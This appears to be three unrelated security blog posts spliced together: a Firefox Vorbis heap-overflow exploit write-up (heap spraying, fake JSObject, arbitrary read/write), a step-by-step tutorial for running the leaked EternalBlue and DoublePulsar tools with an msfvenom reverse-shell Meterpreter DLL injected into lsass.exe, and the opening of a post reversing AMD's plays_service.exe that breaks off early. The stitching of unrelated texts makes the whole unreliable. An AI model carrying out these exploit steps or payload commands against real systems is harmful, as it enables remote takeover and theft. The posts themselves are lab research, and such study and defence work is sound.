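    const uint8_t *segment_table;
    size_t   body_size;            /* sum of the lacing values */
} ogg_page_header;

static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Returns the header length (27 + page_segments), or 0 if the data is not a
   complete Ogg page header. All multi-byte fields are little-endian. */
static size_t ogg_parse_page_header(const uint8_t *p, size_t n, ogg_page_header *h) {
    if (n < 27 || memcmp(p, "OggS", 4) != 0)      /* capture pattern */
        return 0;
    h->version = p[4];
    h->header_type = p[5];                        /* continued / BOS / EOS flags */
    h->granule_position = (uint64_t)rd_le32(p + 6) | (uint64_t)rd_le32(p + 10) << 32;
    h->serial = rd_le32(p + 14);
    h->sequence = rd_le32(p + 18);
    h->crc = rd_le32(p + 22);
    h->page_segments = p[26];
    if (n < 27u + h->page_segments)
        return 0;
    h->segment_table = p + 27;
    h->body_size = 0;
    for (unsigned i = 0; i < h->page_segments; i++)
        h->body_size += h->segment_table[i];
    return 27u + h->page_segments;
}
```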

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In an Ogg file, Vorbis data is encapsulated in the segments described by the segment table of each Ogg page.
An MIT document shows the encapsulation process.

3.2.1. Vorbis Header

Vorbis defines three kinds of header, and a Vorbis bitstream must contain all three:

  • Vorbis Identification Header
    Identifies the bitstream as Vorbis and contains information such as the Vorbis version and basic audio properties of the stream, including the number of channels and the bitrate.
  • Vorbis Comment Header
    Contains user-defined comments, such as vendor information.
  • Vorbis Setup Header
    Contains the information used to set up the codec, such as the complete VQ and Huffman codebooks used in decoding.
3.2.2. Vorbis Identification Header

The Vorbis Identification Header structure can be illustrated as follows:

Pic.2 Vorbis Identification Header Structure
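As a sketch, the 30-byte identification packet can be parsed as follows, using the field order of the Vorbis I specification. The two 4-bit blocksize exponents become ci->blocksizes, which is what makes the size of buffer “a” controllable (section 4.2). The names are hypothetical, and the validation mirrors the spec's constraints (exponents 6 to 13, blocksize_0 <= blocksize_1, framing bit set).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    uint8_t  channels;
    uint32_t sample_rate;
    uint32_t blocksize[2];   /* 1 << exponent: short and long block sizes */
} vorbis_id_info;

static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Layout: type(1) "vorbis"(6) version(4) channels(1) rate(4)
   bitrate_max(4) bitrate_nominal(4) bitrate_min(4) blocksizes(1) framing(1). */
static int vorbis_parse_id_header(const uint8_t *p, size_t n, vorbis_id_info *out) {
    if (n < 30 || p[0] != 1 || memcmp(p + 1, "vorbis", 6) != 0)
        return -1;
    if (rd_le32(p + 7) != 0)                 /* vorbis_version must be 0 */
        return -1;
    out->channels = p[11];
    out->sample_rate = rd_le32(p + 12);
    /* bytes 16..27 hold the three bitrate hints, ignored here */
    unsigned e0 = p[28] & 0x0Fu;             /* blocksize_0: low nibble (LSB-first packing) */
    unsigned e1 = p[28] >> 4;                /* blocksize_1: high nibble */
    if (e0 < 6 || e1 > 13 || e0 > e1)
        return -1;
    if (out->channels == 0 || out->sample_rate == 0 || (p[29] & 1u) == 0)
        return -1;
    out->blocksize[0] = 1u << e0;
    out->blocksize[1] = 1u << e1;
    return 0;
}
```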

3.2.3. Vorbis Setup Header

The Vorbis Setup Header is more complicated than the other headers and contains several substructures, such as codebooks.
After the “vorbis” string comes the number of codebooks, followed by that many CodeBook objects. Next come the TimeBackends, FloorBackends, ResidueBackends, MapBackends and Modes.
The Vorbis Setup Header structure can be roughly illustrated as follows:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

According to the Vorbis spec, a CodeBook structure can be represented as follows:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header comes a length_table array with codebook_entries elements. For an unordered codebook, each element is a 5-bit length; in a sparse codebook each entry is first preceded by a 1-bit flag, and only used entries carry the 5-bit length, so an entry takes up to 6 bits.
The VQ-related fields follow:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits, value plus one
[codebook_sequence_p] 1 bit

Finally comes the VQ table, an array of codebook_dimensions * codebook_entries values for lookup type 2 (lookup type 1 uses a smaller table), each codebook_value_bits wide.
codebook_minimum_value and codebook_delta_value represent floating-point numbers. To stay portable across platforms, the Vorbis spec defines its own 32-bit “float” format, which is converted to the native floating-point type using system math functions. On Windows, it is converted to double first and then to float.
Together, these fields make up a CodeBook structure.
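The Vorbis float format is decoded with the float32_unpack procedure from the Vorbis I specification: a 21-bit mantissa, a 10-bit exponent biased by 788, and a sign bit, combined with ldexp. A minimal C sketch follows; the function name is hypothetical, and libvorbis has its own _float32_unpack.

```c
#include <math.h>
#include <stdint.h>

/* float32_unpack from the Vorbis I spec. */
static double vorbis_float32_unpack(uint32_t x) {
    double mantissa = (double)(x & 0x1FFFFFu);          /* bits 0..20 */
    int exponent = (int)((x & 0x7FE00000u) >> 21);      /* bits 21..30 */
    if (x & 0x80000000u)                                /* bit 31: sign */
        mantissa = -mantissa;
    return ldexp(mantissa, exponent - 788);             /* remove the bias */
}
```

For example, (788 << 21) | 1 decodes to 1.0, and setting the sign bit with exponent 789 and mantissa 3 gives -6.0.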

3.2.3.2. Vorbis Time

In the current Vorbis spec, this structure is only a placeholder; all of its values must be zero.

3.2.3.3. Vorbis Floor

The current Vorbis spec defines two different FloorBackend structures, but they are not related to the vulnerability, so we skip them.

3.2.3.4. Vorbis Residue

The current Vorbis spec defines three kinds of ResidueBackend, and each kind calls a different function during decoding. The structure can be represented as follows:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits, value plus one
[residue_classifications] 6 bits, value plus one
[residue_classbook] 8 bits

residue_classbook defines which CodeBook is used when decoding this ResidueBackend.
MapBackends and Modes do not affect the exploit, so we skip them too.

4. Patch analysis

4.1. Patched Function

From the ZDI blog post, we can see that the vulnerability lies in the following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
    if (book->used_entries > 0)
    {
        int i, j, entry;
        float *t;

        if (book->dim > 8)
        {
            for (i = 0; i < n;)
            {
                entry = decode_packed_entry_number(book, b);
                if (entry == -1) return (-1);
                t = book->valuelist + entry * book->dim;
                /* the inner loop is bounded only by book->dim, never by n */
                for (j = 0; j < book->dim;)
                {
                    a[i++] += t[j++];
                }
            }
        }
        else
        {
            // blablabla
        }
    }
    return (0);
}

Inside the first if branch there is a nested loop. The inner loop is bounded only by book->dim and never checks n, yet it increments i, the index of the outer loop. So if book->dim > n (more generally, whenever i + book->dim exceeds n), “a[i++] += t[j++]” leads to an out-of-bounds write.

In this function, “a” is one of the arguments, and “t” is computed from “book->valuelist”.
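The overrun is easy to reproduce in isolation. The C sketch below models only the nested loop: decode_packed_entry_number() is replaced by a single fixed row t, and the caller gives “a” extra room so the overrun is observable rather than undefined behavior. The bounded variant adds an i < n check to the inner loop, which is one way to close the bug; treat it as an illustration, not as the exact upstream patch.

```c
/* Model of the nested loop in vorbis_book_decodev_add. `a` must have room for
   n + dim floats. Returns the number of elements written. */
static int decodev_add_model(float *a, int n, const float *t, int dim, int bounded) {
    if (dim <= 0)
        return 0;
    int i = 0;
    while (i < n) {                       /* outer loop: one entry per iteration */
        for (int j = 0; j < dim && (!bounded || i < n);)
            a[i++] += t[j++];             /* unbounded: i can run past n */
    }
    return i;
}
```

With dim = 0x48 (72, the value used in the PoC file below) and n = 10, the unbounded loop writes 72 elements, 62 of them past the end of the buffer; the bounded loop stops at 10.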

4.2. Buffer – a

After reading some of the source, I found that “a” is initialized in the following code:

/* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;i<vi->channels;i++)
  vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

“vb->pcm[i]” is passed to the vulnerable function as “a”, and its memory chunk is allocated by _vorbis_block_alloc with a size of vb->pcmend*sizeof(*vb->pcm[i]).
vb->pcmend comes from ci->blocksizes[vb->W], and ci->blocksizes is defined in the Vorbis Identification Header.
So we can control the size of the memory chunk allocated for “a”.
Digging into _vorbis_block_alloc, we find the call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” lies on the mozJemalloc heap.

4.3. Buffer – t

After reading some more source code, I found that book->valuelist gets its value here:

    c->valuelist=_book_unquantize(s,n,sortindex);

The logic of _book_unquantize can be summarized as follows:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
    long j, k, count = 0;
    if (b->maptype == 1 || b->maptype == 2)
    {
        int quantvals;
        float mindel = _float32_unpack(b->q_min);
        float delta = _float32_unpack(b->q_delta);
        float *r = _ogg_calloc(n * b->dim, sizeof(*r));

        switch (b->maptype)
        {
        case 1:
            quantvals = _book_maptype1_quantvals(b);

            // do some math work

            break;
        case 2:
        {
            // inside loops over entries j and dimensions k:
            float val = b->quantlist[j * b->dim + k];

            // do some math work

            break;
        }
        }

        return (r);
    }
    return (NULL);
}

So book->valuelist holds the data decoded from the corresponding CodeBook’s VQ data.
It also lies on the mozJemalloc heap.
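The “do some math work” for lookup type 2 is spelled out in the Vorbis I specification: each value is multiplicand * delta + minimum, plus the previous value of the same vector when codebook_sequence_p is set. This sketch (hypothetical names, unsigned multiplicands as read from the VQ table) shows why “t” is attacker-controlled: every float in valuelist is an affine function of values stored in the file.

```c
#include <stdint.h>

/* Lookup type 2 unquantization per the Vorbis I spec: out has entries*dim slots. */
static void unquantize_type2(const uint32_t *multiplicands, int entries, int dim,
                             float minimum, float delta, int sequence_p, float *out) {
    for (int j = 0; j < entries; j++) {
        float last = 0.0f;                       /* reset for every entry */
        for (int k = 0; k < dim; k++) {
            float val = (float)multiplicands[j * dim + k] * delta + minimum + last;
            if (sequence_p)
                last = val;
            out[j * dim + k] = val;
        }
    }
}
```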

4.4. Cola Time

So, when the vulnerability is triggered:

  • a
    • lies on the mozJemalloc heap;
    • has a controllable size.
  • t
    • also lies on the mozJemalloc heap;
    • has controllable content.
  • book->dim
    • is controllable.

Combining all of the above, we can perform a write (strictly, an addition of controlled float values) on the mozJemalloc heap with a controllable offset and content.
But how does a controllable size help the exploit? Let’s see how mozJemalloc works.

5. mozJemalloc

mozJemalloc is Mozilla’s heap manager, based on jemalloc.
The following global variables give an overview of mozJemalloc:

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTree

In mozJemalloc, memory is divided into chunks, and each chunk is attached to an arena, which manages it. Every user allocation lies inside one of these chunks; mozJemalloc calls such a user allocation a region.
Each chunk is further divided into runs of different sizes, and each run tracks the status of the regions inside it with a bitmap.

5.1. Arena

In mozJemalloc, each arena is assigned an id. When the allocator needs to allocate memory, it uses the id to get the corresponding arena.
Each arena contains a structure called mBin: an array of arena_bin_t objects, each of which manages all regions of one size in that arena. Allocation sizes from 0x10 to 0x800 bytes are managed by mBin.
The runs used by an mBin are not guaranteed to be contiguous, so mBin uses a red-black tree to manage its runs.

5.2. Run

The beginning of a run stores the run’s management information, and the rest of the run provides the regions handed out on allocation. All regions in the same run have the same size.
When allocating a region from a run, the allocator returns the first free region closest to the run header.
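To see why interleaved frees and compensating allocations make placement predictable, here is a toy C model of the lowest-free-first policy: a run of equally sized regions tracked by a 64-bit bitmap (bit set = free). This is not mozJemalloc’s actual data structure; the names and the 64-region limit are simplifications for illustration.

```c
#include <stdint.h>

typedef struct {
    uint64_t free_mask;   /* bit i set = region i is free */
    unsigned nregs;
} toy_run;

static void run_init(toy_run *r, unsigned nregs) {
    r->nregs = nregs;
    r->free_mask = (nregs >= 64) ? ~0ull : ((1ull << nregs) - 1);
}

/* Hand out the lowest free region, i.e. the one closest to the run header. */
static int run_alloc(toy_run *r) {
    if (r->free_mask == 0)
        return -1;
    int idx = 0;
    while (!(r->free_mask & (1ull << idx)))
        idx++;
    r->free_mask &= ~(1ull << idx);
    return idx;
}

static void run_free(toy_run *r, int idx) {
    r->free_mask |= 1ull << idx;
}
```

Once a run is full, freeing regions 5 and 2 means the next two allocations land in region 2 and then region 5, regardless of the order in which they were freed.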

5.3. Arena Partition

In the current mozilla-central code, all JavaScript memory allocations and frees go through moz_arena_-prefixed functions, which only use the arena whose id is 1.
In mozJemalloc, an arena may or may not be a PrivateArena, and the arena with id 1 is a PrivateArena. This means that the Ogg buffer will not be in the same arena as JavaScript objects.
In this situation, the JavaScript arena is isolated from the other arenas.
However, the vulnerable Firefox 59.0 on Windows does not have this PrivateArena, so we can use JavaScript objects to perform heap feng shui for the exploit.
I first debugged an opt+debug build of Firefox on Linux. Because of arena partitioning, it was hard to find a way to write an exploit there, and so far I have only achieved an info leak on Linux.

6. Exploit

In this section, I will show how to build an exploit based on this vulnerability.

6.1. Build Ogg file

First of all, we need to build an Ogg file that triggers this vulnerability. Part of the PoC Ogg file data is shown below:

Pic.4 PoC Ogg file partial data
We can see that codebook->dim equals 0x48.

6.2. Heap Spray

First we allocate a large number of JavaScript arrays. This exhausts all usable regions in mBin, so mozJemalloc has to map new memory and divide it into runs for mBin.
Then we free every other array, leaving many holes inside mBin. However, since we can never know the original layout of mBin, and other objects or threads may be using mBin while we free the arrays, the holes may not be perfectly interleaved.
If the holes are not interleaved, our Ogg buffer may be allocated in a larger contiguous hole, and in that case we cannot control much of the surrounding data.
To avoid this, after the interleaved free we make some compensating allocations in mBin so that the Ogg buffer is allocated in a hole right before an array.

6.3. Modify Array Length

After the heap spray, we can use _ogg_malloc to allocate a region on the mozJemalloc heap.
So we can force the following memory layout:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

Then we trigger the out-of-bounds write and modify the length of one of the arrays. Now we have an array object on the mozJemalloc heap that can read and write out of bounds.
Next, we allocate many ArrayBuffer objects on the mozJemalloc heap, and the memory layout becomes:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read and write ArrayBuffer_contents.
Finally, the memory looks like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control these objects and can do the following:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory through Array_length_modified, we only read “NaN”, because SpiderMonkey uses tagged values.
But if we use Array_length_modified to write something into ArrayBuffer_contents_modified and then read it back from ArrayBuffer_contents_modified, we can leak pointers to JavaScript objects.
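The reason for this detour is the value encoding. On 64-bit builds SpiderMonkey keeps a type tag in the high bits of non-double values, and such a word reinterpreted as a double is a NaN, while the same eight bytes read as raw data keep the pointer intact. The C sketch below assumes a 47-bit payload and uses 0x1FFFC as an illustrative object tag; the exact constants vary between SpiderMonkey versions, and the function names are hypothetical.

```c
#include <math.h>
#include <stdint.h>
#include <string.h>

#define TAG_SHIFT    47                                  /* assumed payload width */
#define PAYLOAD_MASK ((1ull << TAG_SHIFT) - 1)

/* Box a pointer with a type tag in the high bits (illustrative encoding). */
static uint64_t box_pointer(uint64_t ptr, uint64_t tag) {
    return (tag << TAG_SHIFT) | (ptr & PAYLOAD_MASK);
}

/* Reinterpret 64 bits as a double, as a double-typed read would. */
static double as_double(uint64_t bits) {
    double d;
    memcpy(&d, &bits, sizeof d);
    return d;
}
```

Viewed as a double, the boxed word is a NaN; masked as raw bits, it still yields the original pointer.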

6.5. Fake JSObject

By leaking some pointers and writing them into a JavaScript object, we can fake a JSObject in memory, and through this fake object we can write to an address of our choice. (Turning off the baseline JIT helps you see what is going on; the following content assumes the baseline JIT is disabled.)

Pic.5 Fake JavaScript Object

If we allocate two ArrayBuffers of the same size, they are placed contiguously in the JS::Nursery heap. The memory layout looks like this:

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

Using the fake object trick, we can then change the first ArrayBuffer’s metadata so that SpiderMonkey believes it covers the second ArrayBuffer.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can now read and write arbitrary memory.
After this, all you need is a ROP chain to get Firefox into your shellcode.

6.6. Pop Calc?

Finally, we reach our shellcode. The process context is as follows:

Pic.6 achieve shellcode
The corresponding memory chunk information is as follows:

Pic.7 memory address information

However, Firefox release builds enable the sandbox by default, so if you try to pop calc through CreateProcess, the sandbox will block it.

7. Related code and work

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp, huku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

From git clone to Pwned — Owning Windows with DoublePulsar and EternalBlue

By now, you’ve likely heard about the Shadow Brokers and their alleged NSA tool dump. Regardless of whether you believe it was or was not the toolset of a nation-state actor, at least one thing is true: this stuff works, and it works well.

In this blog series I’ll walk through some of what I’ve learned from the dump, focusing specifically on two tools: EternalBlue, an exploit for backdooring Windows via MS17-010, and DoublePulsar, the backdoor implant itself, which allows you to inject DLLs or your own shellcode payload. In this first post, we’ll walk through setting up the environment and getting the front-end framework, Fuzzbunch, to run.

tl;dr — sweet nation-state level hax, remote unauthenticated attacks that pop shells as NT AUTHORITY\System. Remember MS08-067? Yeah, like that.

Setting up the environment

  1. To get going, fire up a Windows 7 host in a virtual machine. Don’t worry about the specs; all of my research and testing has been done in a VirtualBox VM with 1 GB RAM, 1 CPU core, and a 25 GB hard drive.
  2. First and foremost, git clone the Shadow Brokers dump (or download it as a zip). You should be able to grab it from x0rz’ GitHub.
  3. The exploits run through a framework not entirely unlike Metasploit. The framework itself runs in Python, so we need to grab a copy of Python 2.6 for Windows. If you catch yourself wondering why you’re installing a 9 year old copy of Python, remember that the dump is from 2013, and the tools had been in use for a while. Fire up the DeLorean because we’re about to go way back.
  4. Add Python to your environment path by going to Control Panel > System > Advanced System Settings > Environment Variables and adding C:\Python26 to the PATH field.
  5. Because you’re running Python on Windows, there are a bunch of dependencies you’ll need to install. The easiest way to overcome this is to install the Python for Windows Extensions, also known as PyWin. Grab a copy of PyWin 2.6 here.
  6. PyWin will very likely fail on its final step. No problem: open an administrator command prompt, cd C:\python26\scripts and run python pywin32_postinstall.py --install. Python and its dependencies should now be installed.
  7. We’re now ready to launch the Fuzzbunch Framework. Navigate to the folder where you downloaded the exploits, and cd windows. You’ll need to create a folder called listeningposts or the next step will fail, so run mkdir listeningposts.
  8. You should now be able to launch Fuzzbunch — use python fb.py to kick it off.

That’s about it to get the software running. You’ll be asked a few questions, such as your Target IP, Callback IP (your local IP address), and whether you want to use Redirection. For now, choose no. Fuzzbunch will ask for a Logs directory; this is a pretty cool feature that stores your attack history and lets you resume from where you left off. Create a Logs directory somewhere.

At this point I’d encourage you to explore the interface; it’s fairly intuitive, sharing many commands with Metasploit (including help and ?, hint hint). In the next post, we’ll launch an actual attack through Meterpreter and PowerShell Empire DLLs.

By now, your environment is configured, you’ve been able to launch the Fuzzbunch framework, and you’re probably ready to hack something. In this article we’ll go through the process of using EternalBlue to create a backdoor. I’m going to make the following assumptions:

  1. You have configured a local VM network with 1 Windows attack machine and 1 Windows 7 victim machine.
  2. You have gone through the first blog post and can launch the Fuzzbunch framework.
  3. You have basic command of the Windows operating system and command line.

For reference, in my lab environment, this is the setup:

  1. Attacker Box — 10.0.2.5. Windows 7 SP1 x64.
  2. Kali Box — 10.0.2.15. Kali Rolling. (We’ll use this in Part 3)
  3. Victim Box — 10.0.2.7. Windows 7 SP1 x64, without the MS17-010 patches applied.

In the next tutorial we’re going to use the DLL injection function in DoublePulsar; however, the first step in this process is to backdoor the Victim with EternalBlue. Launch Fuzzbunch, and enter the following:

Default Target IP Address []: 10.0.2.7
Default Callback IP Address []: 10.0.2.5
Use Redirection [yes]: no
Base Log directory [D:\logs]: c:\fb_logs

If you have run Fuzzbunch in the past, you may see a list of projects. If this is your first run, you’ll see a prompt to select or create a new project. Select [0] to create a new project. Give it a name, and you should see something like this:

Time to backdoor our Windows box. Remember that everything we do later runs through the DoublePulsar backdoor that EternalBlue installs, so this is a critical step.

  1. Type use eternalblue
  2. Fuzzbunch populates your options with defaults. The good news is, this is mostly correct out of the box. It’ll ask if you want to be prompted for variables; let’s go through this, as there is one default we’re going to change. Type yes or hit enter to continue.
  3. NetworkTimeout [60]: This is fine unless you’re on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  4. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  5. TargetPort [445]: EternalBlue targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  6. VerifyTarget [True]: You can set this to False to speed things up, but it’s a good idea to verify the target exists and is vulnerable before firing things off.
  7. VerifyBackdoor [True]: Verify that your backdoor exploit actually succeeds.
  8. MaximumExploitAttempts [3]: How many times should EternalBlue attempt to install the backdoor? I have seen EternalBlue fail the first attempt and succeed the second — so I’d recommend leaving it at 3.
  9. GroomAllocations [12]: The number of SMB Buffers to use. Accept the defaults.
  10. Target [WIN72K8R2]: In our example, we’re targeting Windows 7. If you’re using XP, select the appropriate option.
  11. Mode :: Delivery Mechanism [FB]: We’re going to use Fuzzbunch. In a future post, we’ll discuss DARINGNEOPHYTE.
  12. Fuzzbunch Confirmation: This confirms that you want to use Fuzzbunch.
  13. Destination IP [10.0.2.7]: This is for your local tunnel. In our example, keep it as default.
  14. Destination Port [445]: As per above, this is for your local tunnel. Accept the default.
  15. You should now see a summary of the configured EternalBlue module, as seen below:

Does everything look good? Hit enter, and we’ll see Fuzzbunch backdoor the victim machine. This happens quickly, but the authors have made a point of a celebratory =-=-=WIN=-=-= banner.

Here’s the exploit in its entirety, from answering yes to a successful backdoor.

Note that EternalBlue checks for the existence of a backdoor before continuing. If you see =-=-=-=-=WIN=-=-=-=-= toward the end, and a green [+] Eternalblue Succeeded message, then congratulations! You’ve just launched a nation state exploit against an unsuspecting lab machine. I’d suggest running through these steps again, right away, to see how things play out when you try to backdoor a box that has already been backdoored with EternalBlue. In the next post, we’ll pop a Meterpreter shell as NT Authority\System in minutes flat.

To recap where we are so far: You’ve installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you’ve backdoored your Victim box. You have a Windows Attack box, a Windows Victim Box, and a Kali box, and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn’t describe your situation. Otherwise, let’s hack things.

Now that we have a backdoor installed, we’re going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as NT Authority\System, the equivalent of root on a Windows box. For this section of the process, I’ll assume the following:

  1. You are familiar with the Linux command line.
  2. You have basic familiarity with Metasploit, specifically the msfconsole and msfvenom tools. If you aren’t familiar with these, Offensive Security’s Metasploit Unleashed is a great primer available for free.
  3. You have backdoored your Victim box successfully.

Creating the Meterpreter payload and starting your Kali listener
Let’s start by creating a malicious DLL file. The DLL we create is going to run the payload windows/x64/meterpreter/reverse_tcp which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

  1. Use the following command to generate the DLL: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll. This uses the payload mentioned, connecting back to 10.0.2.15, on port 9898. It uses the DLL format and outputs the payload to a file called meterpreter.dll.
  2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run python -m SimpleHTTPServer on your Kali box, and use a web browser from the Windows Attack box to browse to http://10.0.2.15:8000 and download it directly.
  3. Start up msfconsole on Kali and use exploit/multi/handler. We’re going to catch our shell here, so use the parameters you set in the DLL by typing set LPORT 9898. You can probably get away without setting the LHOST, but if you want to be sure, type set LHOST 10.0.2.15 as well. I also had some issues with the exploit failing when I didn’t set a payload manually; avoid that by typing set PAYLOAD windows/x64/meterpreter/reverse_tcp. Lastly, type exploit to start your listener. Lots of info in this step, so here’s what you should see:
  4. If everything looks good, it’s time to go back to the Windows Attack box. Fire up Fuzzbunch if it’s not already running, and use doublepulsar.

Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We’re going to change things, so when you see Prompt for Variable Settings? [Yes]:, hit enter.

  1. NetworkTimeout [60]: This is fine unless you’re on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  2. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  3. TargetPort [445]: DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  4. Protocol: Since we’re using SMB here, make sure SMB is selected.
  5. Architecture: Make sure you have this set correctly. If you use x86 on an x64 box, you’ll get a blue screen of death.
  6. Function: DoublePulsar can run shellcode, or run a DLL. Select 2 to Run a DLL.
  7. DllPayload []: This is the full path to your Meterpreter DLL; for example, C:\temp\meterpreter.dll
  8. DllOrdinal [1]: DLLs can export functions by ordinal number instead of by name. Unfortunately this is out of my scope of knowledge; in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you’ll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.
  9. ProcessName [lsass.exe]: The process name you’ll inject into. This is your call: pick something that runs as NT Authority\System, is unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default; this works fine, but some Meterpreter actions (such as hashdump) will likely cause it to crash. You can consider spoolsv.exe, SearchIndexer.exe, and lsm.exe as well; experiment a bit with this field.
  10. ProcessCommand []: Optional, the process command line to inject into. Leave this blank.
  11. Destination IP [10.0.2.7]: Local tunnel IP. For this scenario, leave it as default.
  12. Destination Port [445]: Local tunnel port. Again, we’ll leave this default.

You should now have a summary of the changes you’ve made, which should look like this:

If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check on the EternalBlue backdoor, and inject the DLL. You should see a [+] Doublepulsar Succeeded message. Here’s what the attack looks like from your Windows box:

And now the good part: open up your Kali box. If everything has gone well, you’ve now got a Meterpreter session open, and you should have NT Authority\System. w00t!

In the next post, we’ll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are event viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently alongside your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years: I update my AMD drivers and notice “plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boilerplate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is Python based and has been packaged with something like py2exe. While decompiling Python bytecode is rather trivial, the trick with these types of executables is identifying and locating the Python classes. Python bytecode in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of Python. The first string I track down is “Unable to create Python obj for executable name!”. At first glance it appears to be an error message for when certain Python objects aren’t created properly. Scrolling up in the function that references it, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success: only one zip file exists, and it is named python35.zip! Its filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled Python bytecode files, which I presume to be the application’s core source code and library dependencies.
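The format string and the archive name line up as in the small sketch below: `%s` is a directory, `%c` a path separator and `%d%d` the interpreter’s major and minor version, which yields python35.zip for Python 3.5. The helper that lists the compiled modules uses only the standard zipfile module; the function names are made up for this example, and the install directory is a placeholder because the post does not give it.

```python
import io
import zipfile

def embedded_zip_path(directory: str, sep: str, major: int, minor: int) -> str:
    """Expand the "%s%cpython%d%d.zip" format string seen in IDA's strings view."""
    return "%s%cpython%d%d.zip" % (directory, sep, major, minor)

def list_compiled_modules(archive_file) -> list:
    """Return the .pyc members of a zip (a path or a binary file object)."""
    with zipfile.ZipFile(archive_file) as archive:
        return sorted(name for name in archive.namelist() if name.endswith(".pyc"))

# Placeholder install directory; the real path is not given in the post.
print(embedded_zip_path(r"C:\example\install", "\\", 3, 5))
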